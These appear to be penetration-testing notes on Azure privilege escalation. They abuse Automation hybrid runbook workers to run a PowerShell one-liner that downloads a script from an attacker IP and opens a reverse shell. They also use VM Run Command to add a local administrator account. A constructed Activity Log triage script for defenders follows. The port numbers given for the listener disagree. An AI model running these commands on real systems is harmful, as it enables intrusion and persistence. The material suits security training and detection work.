Privilege escalation

Automation Account

az automation account list
[
  {
    "creationTime": "2021-03-17T14:40:05.340000+00:00",
    "description": null,
    "etag": null,
    "id": "/subscriptions/b413824f-108d-4049-8c11-d52d5d386768/resourceGroups/Test/providers/Microsoft.Automation/automationAccounts/HybridAutomation",
    "lastModifiedBy": null,
    "lastModifiedTime": "2022-10-30T14:26:31.586666+00:00",
    "location": "switzerlandnorth",
    "name": "HybridAutomation",
    "resourceGroup": "Test",
    "sku": null,
    "state": null,
    "tags": {},
    "type": "Microsoft.Automation/AutomationAccounts"
  }
]
Get-AzAutomationHybridWorkerGroup -AutomationAccountName HybridAutomation -ResourceGroupName Test
ResourceGroupName     : Test
AutomationAccountName : HybridAutomation
Name                  : Workergroup1
RunbookWorker         : {defeng-adcsrv.defeng.corp}
GroupType             : User

If a "hybrid runbook worker" is available, it may be possible to execute commands on that server. To do so, a runbook is created that contains a PowerShell file with the malicious code, which sends a command shell back to our netcat listener.

  1. Create a runbook:

Import-AzAutomationRunbook -Name test -Path C:\Pentest\Tools\rshell.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName Test -Type PowerShell -Force -Verbose

Contents of the rshell.ps1 file:

powershell "IEX (New-Object Net.Webclient).downloadstring('http://<IP atacante>:80/Invoke-PowerShellTcp.ps1');Power -Reverse -IPAddress <IP atacante> -Port <Puerto>"

  2. Publish the runbook:

Publish-AzAutomationRunbook -RunbookName test -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

  3. Set port 4444 listening with netcat on the attacker's machine:

C:\AzAD\Tools\netcat\nc64.exe -lvp 443

  4. Run the runbook:

Start-AzAutomationRunbook -RunbookName test -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName Engineering -Verbose

Command execution on a VM by abusing permissions

# Script that creates a local user and adds it to the Administrators group
$passwd = ConvertTo-SecureString "Password@123" -AsPlainText -Force
New-LocalUser -Name usertest -Password $passwd
Add-LocalGroupMember -Group Administrators -Member usertest

# Authenticate to Azure with the obtained access token
$AccessToken = '<JWT>'
Connect-AzAccount -AccessToken $AccessToken -AccountId 024aaf57-30af-45f0-840a-0e21ed143946

# Inspect the VM's network profile, then run the script on the VM through Run Command
Get-AzVM -Name <máquina virtual> -ResourceGroupName <nombre de grupo> | select -ExpandProperty NetworkProfile
Invoke-AzVMRunCommand -VMName <máquina virtual> -ResourceGroupName Engineering -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Pentest\Tools\adduser.ps1' -Verbose
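From the defender's side, both techniques on this page (publishing and starting a runbook on an Automation account, and running a script on a VM through Run Command) leave entries in the Azure Activity Log. The following triage script is an added example, not code from the original notes: it parses constructed Activity Log records (the sample records, the caller names and the `runOn` property name are assumptions, not real telemetry) and rates the relevant operations, treating a job pinned to a hybrid worker group or a caller outside an approved list as high severity.

```python
import json

# Azure Activity Log operation names behind the two techniques on this page:
# runbook publish + job creation on an Automation account, and VM Run Command.
WATCHED_OPERATIONS = {
    "Microsoft.Automation/automationAccounts/runbooks/publish/action": "runbook published",
    "Microsoft.Automation/automationAccounts/jobs/write": "runbook job created",
    "Microsoft.Compute/virtualMachines/runCommand/action": "VM Run Command executed",
}

# Constructed sample records (not real telemetry), trimmed to the fields used below.
# 'runOn' is an assumed property name for the hybrid worker group a job targets.
SAMPLE_LOG = """
{"operationName": "Microsoft.Automation/automationAccounts/read", "caller": "ops@contoso.example", "status": "Succeeded", "resourceId": "/subscriptions/SUB/resourceGroups/Test/providers/Microsoft.Automation/automationAccounts/HybridAutomation", "properties": {}}
{"operationName": "Microsoft.Automation/automationAccounts/runbooks/publish/action", "caller": "user1@contoso.example", "status": "Succeeded", "resourceId": "/subscriptions/SUB/resourceGroups/Test/providers/Microsoft.Automation/automationAccounts/HybridAutomation/runbooks/test", "properties": {}}
{"operationName": "Microsoft.Automation/automationAccounts/jobs/write", "caller": "user1@contoso.example", "status": "Succeeded", "resourceId": "/subscriptions/SUB/resourceGroups/Test/providers/Microsoft.Automation/automationAccounts/HybridAutomation/jobs/1", "properties": {"runOn": "Workergroup1"}}
{"operationName": "Microsoft.Compute/virtualMachines/runCommand/action", "caller": "user1@contoso.example", "status": "Failed", "resourceId": "/subscriptions/SUB/resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/vm1", "properties": {}}
{"operationName": "Microsoft.Compute/virtualMachines/runCommand/action", "caller": "svc-automation@contoso.example", "status": "Succeeded", "resourceId": "/subscriptions/SUB/resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/vm1", "properties": {}}
"""

def parse_events(raw):
    """Parse newline-delimited JSON records, skipping blank lines."""
    return [json.loads(line) for line in raw.splitlines() if line.strip()]

def triage(events, approved_principals=frozenset()):
    """Return one finding per successful watched operation. A caller outside the
    approved set, or a job pinned to a hybrid worker group (the code then runs on
    the on-premises host rather than in the Azure sandbox), is rated high."""
    findings = []
    for ev in events:
        label = WATCHED_OPERATIONS.get(ev.get("operationName"))
        if label is None or ev.get("status") != "Succeeded":
            continue  # only successful, relevant operations are of interest
        run_on = (ev.get("properties") or {}).get("runOn")
        unapproved = ev.get("caller") not in approved_principals
        findings.append({
            "caller": ev.get("caller"),
            "what": label + (f" on hybrid worker group '{run_on}'" if run_on else ""),
            "resource": ev.get("resourceId"),
            "severity": "high" if (unapproved or run_on) else "medium",
        })
    return findings

if __name__ == "__main__":
    for f in triage(parse_events(SAMPLE_LOG), {"svc-automation@contoso.example"}):
        print(f["severity"].upper(), f["caller"], f["what"], f["resource"])
```

On the constructed sample this yields two high findings for user1 (publish, then a job on Workergroup1) and one medium finding for the approved service principal; the failed Run Command and the plain read are ignored.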
